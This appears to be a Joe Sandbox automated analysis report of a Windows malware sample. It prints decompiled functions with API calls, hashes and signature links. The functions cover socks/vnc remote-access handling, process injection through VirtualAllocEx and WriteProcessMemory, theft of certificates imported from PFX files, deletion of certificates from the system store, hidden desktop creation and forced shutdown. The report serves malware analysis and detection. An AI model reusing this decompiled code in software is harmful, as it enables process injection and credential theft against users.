Instruction ID: 593449db1ac078fa3bdf7ed9b5a568a88aa1c6fef4cfded611648cd6274cd6aa
Opcode Fuzzy Hash: 9d4ff8d4d48dc78a8082c039d0c2244b110445254dae3ddbdb144daa29d7d4e0
Instruction Fuzzy Hash: C01186324046046AC224EBE4DD49AEB77EC9F95314F00463FB995F61E1EB38950986AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040707D Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004031F4), ref: 00407088
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004070A1
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,00000001,0041A52F), ref: 004070AC
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004070B4
CertCloseStore.CRYPT32(00000000,00000000), ref: 004070C0

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: 38703a17b5899d12f28f246b31c3ec5ee2e473a523dbcea70ac6b0a668e3a85f
Instruction ID: 332cd0e9099ff7dcf844ff2f3823a36c9eda594828b2a0afe24b89c435398bec
Opcode Fuzzy Hash: 38703a17b5899d12f28f246b31c3ec5ee2e473a523dbcea70ac6b0a668e3a85f
Instruction Fuzzy Hash: D2F0E5326862117BD63117256E09FA7BB6CDB42B91F100133FA80F32A08E389841857E

Uniqueness

Uniqueness Score: -1.00%

Function 004078C6 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 136
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004078C6(void* __ecx) {
				void* __edi;
				void* __esi;
				int _t45;
				signed short _t47;
				signed int _t55;
				intOrPtr _t58;
				signed int _t62;
				void* _t72;
				signed int _t78;
				CHAR** _t81;
				CHAR*** _t90;
				void* _t101;
				void* _t103;

				_t83 = __ecx;
				_t101 = _t103 - 0x74;
				E00408742(_t101 - 0xac, _t101 - 0xac, 0, 0x104);
				_t81 =  *(_t101 + 0x7c);
				if(lstrcmpiA( *_t81, "socks") != 0) {
					_t45 = lstrcmpiA( *_t81, "vnc");
					__eflags = _t45;
					if(_t45 != 0) {
						_t47 = E00408D25( *_t81, _t83, 0);
						_t7 = _t47 - 1; // -1
						_t83 = _t7;
						__eflags = _t7 - 0xfffd;
						if(_t7 > 0xfffd) {
							goto L20;
						}
						_t55 = _t47 & 0x0000ffff;
						 *(_t101 + 0x6c) = _t55;
						__eflags = _t55;
						if(_t55 == 0) {
							goto L20;
						}
						goto L6;
					}
					 *(_t101 + 0x6c) = 0xfffffffe;
					goto L6;
				} else {
					 *(_t101 + 0x6c) =  *(_t101 + 0x6c) | 0xffffffff;
					L6:
					_t58 = E0040B6CA(E00408D25(_t81[2], _t83, 0), _t83, _t81[1]);
					 *((intOrPtr*)(_t101 + 0x70)) = _t58;
					if(_t58 == 0xffffffff) {
						L20:
						E0040C7A4(_t101 - 0xac);
						E0040C7C7(_t101 - 0xac);
						E0040868F( *_t81);
						E0040868F(_t81[1]);
						E0040868F(_t81[2]);
						E0040BE5B(_t81[3]);
						E0040868F(_t81);
						return 0;
					}
					E0040BA83(_t83, _t58);
					E0040BA41( *((intOrPtr*)(_t101 + 0x70)));
					_t62 = E0041A08B(_t83, _t101 - 0x294);
					_t85 = _t101 - 0x290;
					_t64 = E0040956D(_t62 | 0xffffffff, _t101 - 0x290, _t101 + 0x58);
					_t108 = _t64;
					if(_t64 == 0) {
						L19:
						E0040BA2B(_t64,  *((intOrPtr*)(_t101 + 0x70)));
						goto L20;
					}
					 *((char*)(_t101 + 0x7f)) = E0040EEA8(_t85,  *((intOrPtr*)(_t101 + 0x60)), _t108,  *((intOrPtr*)(_t101 + 0x70)), 1,  *((intOrPtr*)(_t101 + 0x58)));
					_t64 = E0040955D(_t101 + 0x58);
					if( *((char*)(_t101 + 0x7f)) == 0) {
						goto L19;
					}
					while(E0040B938(0, _t101 + 0x70, 0, 0) ==  *((intOrPtr*)(_t101 + 0x70))) {
						_t64 = E0040EDBD(_t101 + 0x64, _t85,  *((intOrPtr*)(_t101 + 0x70)), _t101 + 0x7c);
						__eflags = _t64;
						if(_t64 == 0) {
							goto L19;
						}
						__eflags =  *((char*)(_t101 + 0x68)) - 2;
						if( *((char*)(_t101 + 0x68)) == 2) {
							__eflags =  *((short*)(_t101 + 0x66)) - 4;
							if( *((short*)(_t101 + 0x66)) == 4) {
								_t72 = 0xc;
								_t90 = E0040865F(_t72);
								__eflags = _t90;
								if(_t90 != 0) {
									_t90[1] =  *(_t101 + 0x6c);
									 *_t90 = _t81;
									_t90[2] =  *( *(_t101 + 0x7c));
									_t78 = E0040C75F(_t101 - 0xac, 0x20000, E004077E0, _t90);
									__eflags = _t78;
									if(_t78 == 0) {
										E0040868F(_t90);
									}
								}
								E0040C70D(_t85, _t101 - 0xac);
							}
						}
						E0040868F( *(_t101 + 0x7c));
					}
					goto L19;
				}
			}

0x004078c6
0x004078c7
0x004078e2
0x004078e7
0x004078fb
0x0040790a
0x0040790c
0x0040790e
0x0040791d
0x00407922
0x00407922
0x00407925
0x0040792b
0x00000000
0x00000000
0x00407931
0x00407934
0x00407937
0x00407939
0x00000000
0x00000000
0x00000000
0x00407939
0x00407910
0x00000000
0x004078fd
0x004078fd
0x0040793f
0x0040794c
0x00407951
0x00407957
0x00407a48
0x00407a4e
0x00407a59
0x00407a60
0x00407a68
0x00407a70
0x00407a78
0x00407a7e
0x00407a8c
0x00407a8c
0x0040795e
0x00407966
0x00407972
0x0040797d
0x00407983
0x00407988
0x0040798a
0x00407a40
0x00407a43
0x00000000
0x00407a43
0x004079a3
0x004079a6
0x004079af
0x00000000
0x00000000
0x00407a28
0x004079c1
0x004079c6
0x004079c8
0x00000000
0x00000000
0x004079ca
0x004079ce
0x004079d0
0x004079d5
0x004079d9
0x004079df
0x004079e1
0x004079e3
0x004079e8
0x004079ef
0x00407a03
0x00407a06
0x00407a0b
0x00407a0d
0x00407a10
0x00407a10
0x00407a0d
0x00407a1b
0x00407a1b
0x004079d5
0x00407a23
0x00407a23
0x00000000
0x00407a28

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004078F7
lstrcmpiA.KERNEL32(?,vnc), ref: 0040790A

Part of subcall function 0040C75F: SetLastError.KERNEL32(0000009B,0041A383,00000000,Function_00005336,00000000,00421760,00000000,00000104), ref: 0040C769

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

Strings

socks, xrefs: 004078F0
vnc, xrefs: 00407903

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: lstrcmpi$ErrorFreeHeapLast
String ID: socks$vnc
API String ID: 2443694545-270151703
Opcode ID: b515891af4bb114562f25120bcba9212e1f057b3b12b55194163a37159f03fe1
Instruction ID: 1f3726796aef6b81a29c9d636bdc3d8be57c6b8c88a4876629603ab1ac2bcd97
Opcode Fuzzy Hash: b515891af4bb114562f25120bcba9212e1f057b3b12b55194163a37159f03fe1
Instruction Fuzzy Hash: 75419E31A00208DBDF20EF31CC81A9D77A5AF44314F21467BB964B71E2DB39E9058F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D02B Relevance: 6.1, APIs: 4, Instructions: 96
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D02B(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t35;
				void** _t39;
				void* _t41;
				intOrPtr* _t42;
				int _t43;
				long _t45;
				void* _t46;
				SIZE_T* _t47;
				signed int _t49;
				void** _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
				_t45 =  *(_t60 + 0x50);
				_v24 = _t45;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t45) == 0) {
					_t35 = VirtualAllocEx(_a4, 0, _t45, 0x3000, 0x40);
					_v12 = _t35;
					__eflags = _t35;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t46 = E004086E2(__eflags, _t55, _t45);
					_t47 = 0;
					__eflags = _t46;
					if(_t46 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t30 =  &_v12;
						 *_t30 = _v12 & 0x00000000;
						__eflags =  *_t30;
						goto L17;
					}
					_t39 = _t60 + 0xa0;
					__eflags = _t39[1];
					if(_t39[1] <= 0) {
						L15:
						E0040868F(_t46);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t41 =  *_t39;
					__eflags = _t41;
					if(_t41 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t42 = _t41 + _t46;
					while(1) {
						__eflags =  *_t42 - _t47;
						if( *_t42 == _t47) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t42 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t42 = _t42 +  *((intOrPtr*)(_t42 + 4));
							_t47 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t47;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t49 =  *(_t42 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t49;
							if(_t49 > 0) {
								_t52 = (_t49 & 0x00000fff) +  *_t42 + _t46;
								 *_t52 =  *_t52 + _t54 - _v20;
								__eflags =  *_t52;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t43 = WriteProcessMemory(_a4, _v12, _t46, _v24, _t47);
					__eflags = _t43;
					_t26 =  &_v5;
					 *_t26 = _t43 != 0;
					__eflags =  *_t26;
					goto L15;
				}
				return 0;
			}

0x0040d034
0x0040d039
0x0040d03b
0x0040d040
0x0040d043
0x0040d04f
0x0040d065
0x0040d06b
0x0040d06e
0x0040d070
0x0040d126
0x00000000
0x0040d126
0x0040d07d
0x0040d07f
0x0040d081
0x0040d083
0x0040d10f
0x0040d11c
0x0040d122
0x0040d122
0x0040d122
0x00000000
0x0040d122
0x0040d089
0x0040d08f
0x0040d092
0x0040d103
0x0040d104
0x0040d109
0x0040d10d
0x00000000
0x00000000
0x00000000
0x0040d10d
0x0040d094
0x0040d096
0x0040d098
0x00000000
0x00000000
0x0040d09a
0x0040d0a2
0x0040d0a4
0x0040d0a7
0x0040d0e8
0x0040d0e8
0x0040d0ea
0x00000000
0x00000000
0x0040d0ab
0x0040d0ae
0x0040d0b1
0x0040d0e3
0x0040d0e3
0x0040d0e6
0x0040d0e6
0x00000000
0x0040d0e6
0x0040d0b6
0x0040d0b6
0x0040d0b8
0x0040d0bb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d0bd
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c8
0x0040d0d7
0x0040d0d9
0x0040d0d9
0x0040d0d9
0x0040d0db
0x0040d0de
0x0040d0de
0x00000000
0x0040d0bd
0x0040d0f7
0x0040d0fd
0x0040d0ff
0x0040d0ff
0x0040d0ff
0x00000000
0x0040d0ff
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000), ref: 0040D047
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000), ref: 0040D065
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000), ref: 0040D0F7
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,00000000), ref: 0040D11C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: b539ad087fd41f60fddc09f845cc7e8827b533daa64100703ab3c5966d43dce8
Instruction ID: 48fcd55c88582cf44bc100ce801bf6e1b4d8d242265c21130244c363fc438a3d
Opcode Fuzzy Hash: b539ad087fd41f60fddc09f845cc7e8827b533daa64100703ab3c5966d43dce8
Instruction Fuzzy Hash: B031A032E00219AFCB109FA4CC44BAEBBB9EF45745F05807AE505BB2E0CB759D59CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409D0E Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D0E(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x00409d16
0x00409d1b
0x00409d20
0x00409d22
0x00409d27
0x00409d2e
0x00409d35
0x00409d4f
0x00409d42
0x00409d44
0x00409d44
0x00409d4a
0x00409d4a
0x00409d54
0x00000000
0x00409d5a
0x00409d5f

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00409D1B
Thread32First.KERNEL32 ref: 00409D35
Thread32Next.KERNEL32 ref: 00409D4A
CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 00409D54

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 09eba30475f27d1026a510253ea2c42c05d3c48d837f16ff5581dec08f8bc5e0
Instruction ID: f735df6cbc56214a7077f27c13ee559857e3c13d4609aa1c432e18a612be9757
Opcode Fuzzy Hash: 09eba30475f27d1026a510253ea2c42c05d3c48d837f16ff5581dec08f8bc5e0
Instruction Fuzzy Hash: 8EF0BE365801156ADB20B6BA9C40DEF3BAC9F81310B000126F910E21C3D6788C028AB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B783 Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 0040B78C
bind.WS2_32(00000000,?,-0000001D), ref: 0040B7AC
listen.WS2_32(00000000,?), ref: 0040B7BB
closesocket.WS2_32(00000000), ref: 0040B7C6

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: ab6accfa48155aa3795f50c8f067cecdd8dbfe266a73fc705b078d4b99f563fc
Instruction ID: c3cd39baaf604cf48b54a9122d5c0596cc39db20abb02e46942509d29c370356
Opcode Fuzzy Hash: ab6accfa48155aa3795f50c8f067cecdd8dbfe266a73fc705b078d4b99f563fc
Instruction Fuzzy Hash: DCF0373221111176E2211F39AD4EA6F35AAEFD5BB1B14072DF562E61F0E73884819528

Uniqueness

Uniqueness Score: -1.00%

Function 004070CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004070CD(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00419F02() != 0) {
					GetSystemTime( &_v760);
					E00412F05(0x80,  &_v600);
					_t74 =  &_v744;
					E00412F05(0x81, _t74);
					E00406EAC( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E00409450( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E0041393A(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E004086CB(_t79 + 0x48 + E00409301( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E0040956D(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E0041393A(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E0040955D( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x004070cd
0x004070d3
0x004070da
0x004070e6
0x004070ec
0x004070f2
0x00407132
0x00407144
0x00407149
0x00407152
0x0040715e
0x00407168
0x0040716e
0x00407174
0x00407177
0x0040717f
0x00407187
0x0040718a
0x0040718f
0x00407194
0x00407199
0x004071b1
0x004071b6
0x004071d9
0x004071e4
0x004071ed
0x004071ff
0x00407204
0x00407204
0x004071ed
0x004071b6
0x00407199
0x00407213

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 004070E6

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

GetSystemTime.KERNEL32(?), ref: 00407132

Part of subcall function 00406EAC: GetUserNameExW.SECUR32(00000002,?,?), ref: 00406EC1

Strings

.txt, xrefs: 004071C8

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 09a161638008ef88b87793c59afd77cea2ce9cc7d54842d02f55c889bb2a1840
Instruction ID: fe2ad3ac30337c3fd404587e7cf227e74b286f9f6100f1dd0aebc624a035e21b
Opcode Fuzzy Hash: 09a161638008ef88b87793c59afd77cea2ce9cc7d54842d02f55c889bb2a1840
Instruction Fuzzy Hash: 1831E531504345AACB21EF55CD05FABB7A8BF88304F00052EB999E71D3D778E984C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00414D4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00414D4D(void* __ebx) {
				void* __ecx;
				signed char _t8;
				void* _t18;

				_t8 =  *0x421254;
				_t19 = _t8 & 0x00000010;
				if((_t8 & 0x00000010) == 0) {
					__eflags = _t8 & 0x00000008;
					if(__eflags != 0) {
						E00414860(__ebx, _t18, __eflags);
						_t8 =  *0x421254;
					}
					__eflags = _t8 & 0x00000003;
					if((_t8 & 0x00000003) == 0) {
						__eflags = _t8 & 0x00000004;
						if((_t8 & 0x00000004) != 0) {
							return ExitWindowsEx(0x14, 0x80000000);
						}
						return _t8;
					} else {
						E00409D62(L"SeShutdownPrivilege");
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x421254 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					return E0041A3A6(_t19);
				}
			}

0x00414d4e
0x00414d53
0x00414d55
0x00414d5e
0x00414d60
0x00414d62
0x00414d67
0x00414d67
0x00414d6c
0x00414d6e
0x00414d99
0x00414d9b
0x00000000
0x00414da4
0x00414dab
0x00414d70
0x00414d75
0x00414d8c
0x00414d91
0x00414d98
0x00414d98
0x00414d57
0x00414d5d
0x00414d5d

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00414D91

Part of subcall function 0041A3A6: ExitWindowsEx.USER32(00000014,80000000), ref: 0041A3D4

Strings

SeShutdownPrivilege, xrefs: 00414D70

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: ExitInitiateShutdownSystemWindows
String ID: SeShutdownPrivilege
API String ID: 1562069236-3733053543
Opcode ID: 096a0dacd19487d6b3bb69b387e1922dc4d6eb7f1bf1a69825cccf429356f47c
Instruction ID: 450fbeeccb586d711e319354e5922d52df3e5f27e2d03e3c0078dd546a5091f6
Opcode Fuzzy Hash: 096a0dacd19487d6b3bb69b387e1922dc4d6eb7f1bf1a69825cccf429356f47c
Instruction Fuzzy Hash: 9DF065B6200180A9ED6827747C49FF62758DBC1B85F64406EF9D6F46F1CB2C4852A23D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAA8 Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 0040BAB1
bind.WS2_32(00000000,00000017,-0000001D), ref: 0040BAD1
closesocket.WS2_32(00000000), ref: 0040BADC

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: 699ce61b4400272c0f6e060ca329216958558b8fb31896b0da2d50d78ebd4287
Instruction ID: 157fd2e1ea03696ba32e0bcb06a6e7039bf6796fb7ec2617b1f1eb9ba6238268
Opcode Fuzzy Hash: 699ce61b4400272c0f6e060ca329216958558b8fb31896b0da2d50d78ebd4287
Instruction Fuzzy Hash: 27E0DF3270010076E6202B39BD0EA2F25A9EBC27B0B180724F872E61E1E73888828528

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A3A6(void* __eflags) {
				signed int _v124;

				if(E0041938A( &_v124) == 0) {
					return 0;
				} else {
					_v124 = _v124 | 0x00000020;
					 *0x421868 =  *0x421868 | 0x00000010;
					E004193E2( &_v124);
					ExitWindowsEx(0x14, 0x80000000);
					return 1;
				}
			}

0x0041a3b7
0x0041a3e1
0x0041a3b9
0x0041a3b9
0x0041a3bd
0x0041a3c8
0x0041a3d4
0x0041a3dd
0x0041a3dd

APIs

Part of subcall function 0041938A: CreateMutexW.KERNEL32(004218A0,00000000,004216E8,?,?,004081FC,?,?,743C152E,00000002), ref: 004193B0

ExitWindowsEx.USER32(00000014,80000000), ref: 0041A3D4

Strings

, xrefs: 0041A3B9

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CreateExitMutexWindows
String ID:
API String ID: 2837814579-3916222277
Opcode ID: 89f18bb60c63469aac1a9bc8002225cb9b7f48ffc8912199cfd8bfb40dcad57f
Instruction ID: 2fa77e001207c1f50b75d6c9c022ac0ba1c914856a394f6dfd3b05473b7f6fce
Opcode Fuzzy Hash: 89f18bb60c63469aac1a9bc8002225cb9b7f48ffc8912199cfd8bfb40dcad57f
Instruction Fuzzy Hash: 9FE0863050030C5AEF10ABB088866C97BA89705348F700419DD11E319282759485DE64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A436 Relevance: 3.1, APIs: 2, Instructions: 62
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A436(void* __eax, void* __ecx, void* _a4, intOrPtr* _a8, void* _a12) {
				long _v8;
				char _v12;
				void* __esi;
				void* _t21;
				intOrPtr* _t25;
				void* _t29;
				char _t34;
				intOrPtr _t39;

				_push(__ecx);
				_push(__ecx);
				_t29 = __eax;
				_t34 = 0;
				if(__eax == 0 || __eax > 0xa00000) {
					_t29 = 0xa00000;
				}
				_v12 = _t34;
				while(_a12 == 0 || WaitForSingleObject(_a12, 0) == 0x102) {
					_t4 = _t34 + 0x1000; // 0x1000
					_v8 = 0x1000;
					if(E0040861A(_t4,  &_v12) == 0) {
						break;
					}
					_t39 = _v12;
					if(InternetReadFile(_a4, _t39 + _t34, _v8,  &_v8) == 0) {
						break;
					}
					if(_v8 == 0) {
						_t25 = _a8;
						if(_t25 == 0) {
							E0040868F(_t39);
						} else {
							 *_t25 = _t39;
							 *((intOrPtr*)(_t25 + 4)) = _t34;
						}
						_t21 = 1;
						L11:
						return _t21;
					}
					_t34 = _t34 + _v8;
					if(_t34 <= _t29) {
						continue;
					}
					break;
				}
				E0040868F(_v12);
				_t21 = 0;
				goto L11;
			}

0x0040a439
0x0040a43a
0x0040a43e
0x0040a440
0x0040a449
0x0040a44f
0x0040a44f
0x0040a451
0x0040a454
0x0040a46c
0x0040a475
0x0040a483
0x00000000
0x00000000
0x0040a485
0x0040a49e
0x00000000
0x00000000
0x0040a4a4
0x0040a4be
0x0040a4c3
0x0040a4cd
0x0040a4c5
0x0040a4c5
0x0040a4c7
0x0040a4c7
0x0040a4d2
0x0040a4b7
0x0040a4bb
0x0040a4bb
0x0040a4a6
0x0040a4ab
0x00000000
0x00000000
0x00000000
0x0040a4ab
0x0040a4b0
0x0040a4b5
0x00000000

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040A45F
InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 0040A496

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: FileInternetObjectReadSingleWait
String ID:
API String ID: 226868713-0
Opcode ID: 8ecf22c974566b38aa8273aaf79008432d154e779782f5e10ed23c5289903350
Instruction ID: 9843942d8070e7cbc4ec5a3c4fec27c147858968d510e7c546f8daa8364aac3f
Opcode Fuzzy Hash: 8ecf22c974566b38aa8273aaf79008432d154e779782f5e10ed23c5289903350
Instruction Fuzzy Hash: E7119034A00309EBDF119FA4CD48BEEBBA9AB40344F14407AE405B3291D7F99E65DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419513 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419513(WCHAR* __eax) {
				char _v20;
				void* __esi;
				struct HDESK__* _t3;
				WCHAR* _t7;

				_t7 = __eax;
				if(__eax == 0) {
					_t7 =  &_v20;
					E00412F05(0xa2, _t7);
				}
				_t3 = OpenDesktopW(_t7, 0, 0, 0x10000000);
				if(_t3 == 0) {
					return CreateDesktopW(_t7, 0, 0, 0, 0x10000000, 0);
				}
				return _t3;
			}

0x0041951c
0x00419522
0x00419524
0x0041952e
0x0041952e
0x0041953c
0x00419544
0x00000000
0x0041954c
0x00419556

APIs

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041953C
CreateDesktopW.USER32 ref: 0041954C

